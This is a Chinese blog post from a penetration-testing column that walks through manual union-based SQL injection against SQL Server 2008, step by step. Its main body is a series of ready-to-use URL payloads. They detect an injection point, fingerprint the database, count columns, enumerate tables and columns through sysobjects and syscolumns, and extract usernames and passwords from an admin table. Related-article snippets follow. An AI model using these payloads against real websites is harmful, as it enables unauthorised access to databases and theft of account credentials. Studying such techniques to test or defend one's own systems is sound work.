SQL注入--sql server

最新推荐文章于 2024-06-01 15:00:55 发布
最新推荐文章于 2024-06-01 15:00:55 发布
阅读量909 收藏 2
点赞数
分类专栏: 渗透测试 文章标签: SQL注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/pygain/article/details/52733747
版权

谈到SQL注入,不得不提它的本质,把用户的输入数据当做代码来执行。两个关键条件,第一个是用户能够控制的输入;第二个是程序要执行的代码,拼接了用户输入的数据

按照注入的技术类型可分解为:

显错注入和盲注入,其中盲注入可分为,联合查询注入,堆查询注入,DNS查询注入,报错注入,延时注入和布尔注入。这篇文章重点在分享一些联合查询注入的命令


1.首先来判断注入点(URL类)

当目标URL为:www.target.com/1.php?id=88时,来进行简单的注入点判断;

www.target.com/1.php?id=88-0 无变化
www.target.com/1.php?id=88-1 报错


www.target.com/1.php?id=88 and 1=1 无变化
www.target.com/1.php?id=88-1 and 1=2 报错

2.判断是何种数据库
URL+/*!%20s*/ 错误则是MySQL;URL+/*pc 正常为MySQL

URL+and exists(select @@version)-- 正常为SQL Server

3.SQL Server 2008注入过程

判断字段数:

id=1/**/Order/**/By/**/5/**/-- 正常则字段数≥5      --和/**/均为注释用来注释执行语句时的代码 保证注入代码正常执行
id=1/**/Order/**/By/**/6/**/-- 错误则字段数<6

判断数据类型,字符型就可以SQL注入了

id=1/**/union/**/all/**/select/**/NULL,NULL,NULL,NULL,NULL--   正常
id=1/**/union/**/all/**/select/**/NULL,NULL,’test’,NULL,NULL--    正常 (一位一位去尝试)

显示数据库版本
id=1/**/and/**/1=2/**/union/**/all/**/select/**/NULL,NULL,@@version,NULL,NULL--

当前库名
and/**/1=2/**/union/**/all/**/select/**/NULL,db_name(),NULL,NULL,NULL from sysobjects--

指定库表名
and/**/1=2/**/union/**/all/**/select/**/NULL,(select top 1 name from库名..sysobjects where xtype='u' and name not in(select top 0 name from 库名..sysobjects where
xtype='u')),NULL,NULL,NULL from sysobjects--

当前库查询表

and/**/1=2/**/union/**/all/**/select/**/NULL,(select top 1 name from sysobjects where xtype='u' and name not in(select top 0 name from sysobjects where
xtype='u')),NULL,NULL,NULL from sysobjects--     //第二个top从0开始输入 1,2,....列出当前库所有表名

查询admin变内的字段

d=1/**/and/**/1=2/**/union/**/all/**/select/**/NULL,(select top 1 name from syscolumns where id in (select id from sysobjects where name='admin') and name not in (select top 1 name from syscolumns where id in (select id from sysobjects where name='admin'))),NULL,NULL,NULL fromsysobjects--//第二个top从0开始遍历

查看admin变字段id,username,password的内容

id=1 and 1=2 union all select id,username,password,NULL,NULL from admin--

webshell写入和系统命令执行就不能再分享了





帽子不够白
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQL server注入
weixin_45958861的博客
09-20 1584
较为复杂 一般不用手工 用工具 1.注入语句 ①*判断数据库类型 and exists (select * from sysobjects)–返回正常为mssql(也名sql server) and exists (select count() from sysobjects)–有时上面那个语句不行就试试这个哈 ②判断数据库版本 and 1=@@version–这个语句要在有回显的模式下才可以哦 and substring((select @@version),22,4)=‘2008’–适用
09-sql注入-mssql1
08-03
SQL注入是一种常见的安全漏洞,攻击者通过输入恶意SQL语句来获取未授权的数据或执行恶意操作。针对SQL Server,攻击者可能使用的注入技术包括: 1. 判断是否存在注入漏洞。 2. 确定数据库类型。 3. 猜测表名和字段。...
SQL Server注入大全及防御
网络 人生 学习 进步
09-17 1418
  SQL Server是中小型网站广泛使用的数据库,由于功能强大也滋生了很多安全问题,国内又因为SQL注入攻击的很长一段时间流行,导致对SQL Server的入侵技巧也层出不穷,由于SQL Server支持多语句,相信很多小黑在对SQL Server进去SQL注入的时候很少使用猜解表名之类的方法,而直接转向使用SQL Server的存储过程和函数快速的拿权限,下面我就围绕SQL Server的系
SQL Server注入
最新发布
余十步的博客
06-01 603
原理:凡是在group by后面出现的字段,必须同时在select后面出现;凡是在select后面出现的、同时未在聚合函数中出现的字段,必须同时出现在group by后面。原理:试图将一个字符串与非字符串基本,或将一个字符串转换为另一个不兼容的类型时,那么SQL编辑器会抛出异常。不嵌入子查询:常用内置函数(conver或者case函数:将一种数据类型转换为另一种数据类型)也可以通过定义十六进制的SQL语句,使用exec函数执行。语句执行正常代表数据类型兼容,就可以将x换位SQL语句(如利用视图查询)
SQL Server 注入
mingyqf的博客
03-22 2393
SQL Server 注入 (转至:https://www.1024sou.com/article/798425.html) 侵删 一、简介 SQL Server数据库是由Microsoft开发和推广的关系数据库管理系统(DBMS),是一个比较大型的数据库。端口号为1433。数据库后缀名 .mdf,注释符是 – sa权限:数据库操作,文件管理,命令执行,注册表读取等 (数据库最高权限system) db权限:文件管理,数据库操作等权限 users-administrators **public权限:**数
SQL-Server注入
qq_41781465的博客
08-17 130
col_name():可以根据id值得到对像的名称,而且可以返回指定下标的结果 ————————————————————object_id()只能返回用户创建的对像的ID,像以sys开头的表都是系统表所以返回不了的。特性:union all select 联合查询要加all。记录了数据库中所有表的字段,常⽤字段为id、name和xtype。object_id(name)可以根据表对象名称得到表对象的ID,:记录了数据库中所有表,常⽤字段为id、name和xtype。@@version 版本。
java 连接sqlserver使用的java-sqlserver-connect.jar包
04-09
在本例中,我们关注的是"java-sqlserver-connect.jar",这是一个专门为Java应用程序提供与Microsoft SQL Server数据库交互功能的库。这个JAR文件支持两个不同的Java运行时环境(JRE),即JRE7和JRE8。 首先,了解...
SQL注入工具-御剑
06-07
【描述】:“SQL注入工具-御剑SQL注入工具-御剑SQL注入工具-御剑SQL注入工具-御剑SQL注入工具-御剑SQL注入工具-御剑” 描述中的重复部分强调了御剑作为SQL注入工具的核心属性。SQL注入是黑客通过构造恶意的SQL语句...
超级SQL注入工具-web-sql
10-28
超级SQL注入工具是一款基于HTTP协议自组包的SQL注入工具,支持出现在HTTP协议任意位置的SQL注入,支持各种类型的SQL注入 支持Bool型盲注、错误显示注入、Union注入,支持Access、MySQL5以上版本、SQLServer、Oracle...
sql注入网站源码
04-09
这个"sql注入网站源码"提供了一个具有SQL注入漏洞的ASP(Active Server Pages)网站实例,对于学习如何检测、防范和修复这类漏洞非常有价值。ASP是微软开发的一种服务器端脚本语言,常用于构建动态网站。 在ASP中,...
SQL注入的一个ASP网站源码
02-06
SQL注入的一个ASP网站源码,ASP+ACCESS手动注入环境搭建,用来练手不错! 带SQL注入的一个ASP网站源码,ASP+ACCESS手动注入环境搭建,用来练手不错!
sql server 2008 mysql 手工注入
03-25
本人原创 sql server 2008 mysql 手工注入 里面有源码和数据库文件 还有用于测试的项目
整理出来的SQL注入点关键字
03-06
整理出来的关于SQL注入时所需要的关键字,很全面,覆盖了很多,包括asp,php等等
专门针对SQL Server的注入手段
Wayne_Deng的专栏
07-13 1288
小弟潜心研究sql injection一个余月,发现国内存在sql injection漏洞的网站一大把一大把,80%以上的asp网站都似乎是不学无术、骗吃骗喝的“程序员”所做。不光漏洞多,而且网站内部结构也是零乱无比…… 关于sql injection网上流传甚广的SQL注入天书可以说是非常不错的入门介绍了,在这里也要重复一些老套的手法。 首先上手的都是1=1,1=2的方法测试验证漏洞,字符则用
SQL server 中的SQL 注入
d1996a的博客
09-27 399
SQL server 中的sql注入 实验环境: 在windows server 2008虚拟机中安装SQL server 数据库。安装phpstudy ,通过一台Windows7 访问连接windows server 2008. SQL server 联合注入 首先判断注入点,输入id=1,页面正常回显。 首先判断是否是数值型: id=1 and 1=1,页面正常回显 id=1 and 1=2,页面空显示,可以判断是数值型。 因为有显示位,可以用联合注入进行注入。 首先判断显示位,由此可以看出显示位
2004-8-5+ 给mssql添加用户
weixin_34113237的博客
06-29 90
打开管理器,找到需要添加用户的数据库,点开,右键单击用户,选择“新建数据库用户”,弹出“数据库用户属性-新建用户”,填好登陆名和用户名,分配好角色,然后就可以啦。先看登陆名。一般从下拉列表里选“新建”,跳出“sql server登录属性-新建登录”,然后在这里填名称,设定sel servr身份验证的密码,然后从下拉列表里选一个数据库,就是你要添加用户的那个,完事后确定。这样在登陆名下拉列表就会多出...
SQL注入-基于MSsql(sql server)的注入
LJH1999ZN的博客
02-13 5269
目录 一、如何判断该网站使用的是sql server 数据库 二、sql server 数据库包含三张主要系统表 三、sql server 主要函数 四、数据库的注入流程 五、sql server 的联合查询 六、sql server 的报错注入 七、sql server 的布尔型盲注。 一、如何判断该网站使用的是sql server 数据库 根据后缀判断:如果后缀为aspx,数据库大概是sql server 根据报错信息判断,报错信息中有Microsoft 字样。 根据系统表判断,a
1、sql server数据库进行sql注入
weixin_51520483的博客
05-15 902
1、判断数据类型是很重要的一点,影响后面的注入语句2、确定列数时,要多测几组数据,从而分析判断列数,并不是遇到第一个报错就停止测试3、正常网页(例如id=1,参数正确)没有注入回显时,试试报错情况(id=-1),注入回显有可能被正常返回数据覆盖4、注入回显的字段有可能整形、字符、小数等,注意是否需要单引号5、最好先全部统一会先字段类型,比如全部整形,挨个轮流改变为字符形。
sqlserver-oledb-provider
07-13
### 回答1: SQL Server OLE DB Provider是一个用于连接和访问SQL Server数据库的数据提供程序。它是由Microsoft开发的,为了方便开发人员在多种编程环境中与SQL Server数据库进行交互而设计。 SQL Server OLE DB Provider可以与各种编程语言和开发工具一起使用,包括Visual Basic、C#、ASP.NET等。它提供了一系列的接口和方法,使得开发人员可以方便地执行数据库操作,如查询、插入、更新和删除数据。 通过SQL Server OLE DB Provider,开发人员可以使用SQL语言来编写和执行数据库查询。它还支持事务处理和存储过程等高级功能,使得开发人员可以更加灵活和高效地操作数据库。 SQL Server OLE DB Provider还提供了一些性能优化的功能,例如连接池和命令缓存。连接池允许开发人员重复使用数据库连接,以减少连接的开销。命令缓存可以缓存已执行的命令,以加快后续执行同样命令的速度。 总之,SQL Server OLE DB Provider是一个强大而灵活的数据提供程序,可以帮助开发人员快速、高效地与SQL Server数据库进行交互。无论是小型的个人项目还是大型的企业应用,它都是一个非常有用的工具。 ### 回答2: SQL Server OLE DB Provider是一种用于连接和访问SQL Server数据库的数据访问技术。它是SQL Server提供的一种OLE DB驱动程序,用于支持通过OLE DB接口进行数据库操作。 SQL Server OLE DB Provider的使用可以通过编程语言(如C#、VB.Net等)来实现。首先,需要通过连接字符串指定要连接的SQL Server数据库的相关信息,如服务器名称、数据库名称、身份验证方式等。然后,使用Connection对象建立与数据库的连接。接下来,可以使用Command对象执行SQL语句,如查询、插入、更新、删除等操作。执行SQL语句后,可以通过DataReader对象来读取和处理查询结果。最后,使用Connection对象关闭与数据库的连接。 SQL Server OLE DB Provider可以提供高性能的数据访问能力,并且支持灵活的数据操作。它还提供了一些高级特性,如事务处理、命令缓存、数据缓存等,可以提升数据库操作的效率和性能。此外,SQL Server OLE DB Provider还支持参数化查询,可以防止SQL注入攻击,并且提供了一些其他的安全特性,如加密通信等。 总而言之,SQL Server OLE DB Provider是一种可靠和高效的数据库访问技术,适用于连接和操作SQL Server数据库。通过合理的使用,可以实现对数据库的快速和可靠的访问,并提供了丰富的功能和特性来支持开发人员的需求。 ### 回答3: SQL Server OLE DB Provider是一种用于连接和访问SQL Server数据库的OLE DB提供程序。OLE DB是一种面向组件的数据访问技术,允许应用程序通过一组统一的API连接到不同的数据源,包括SQL ServerSQL Server OLE DB Provider提供了一个强大的接口,使开发人员能够使用SQL Server数据库进行高效的数据访问。它支持基本的数据操作(如插入、更新、删除和查询),还提供了事务处理的功能,可以保证数据的一致性和完整性。 使用SQL Server OLE DB Provider,开发人员可以编写基于SQL语言的查询来查询和操作数据库中的数据。他们可以使用标准的ADO(ActiveX Data Objects)对象模型来进行数据访问和操作,这使得编写和维护数据访问代码变得更加简单和方便。 除了支持标准的数据操作功能,SQL Server OLE DB Provider还提供了一些高级功能,如连接池、命令参数化、异步查询和分布式查询。这些功能可以提高数据访问的性能和灵活性,并帮助开发人员更好地管理和优化数据库操作。 总之,SQL Server OLE DB Provider是一种在应用程序中连接和访问SQL Server数据库的重要工具。它提供了强大的功能和灵活性,使开发人员能够高效地处理和管理数据库中的数据。如果您需要与SQL Server数据库进行交互,使用SQL Server OLE DB Provider将是一个很好的选择。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值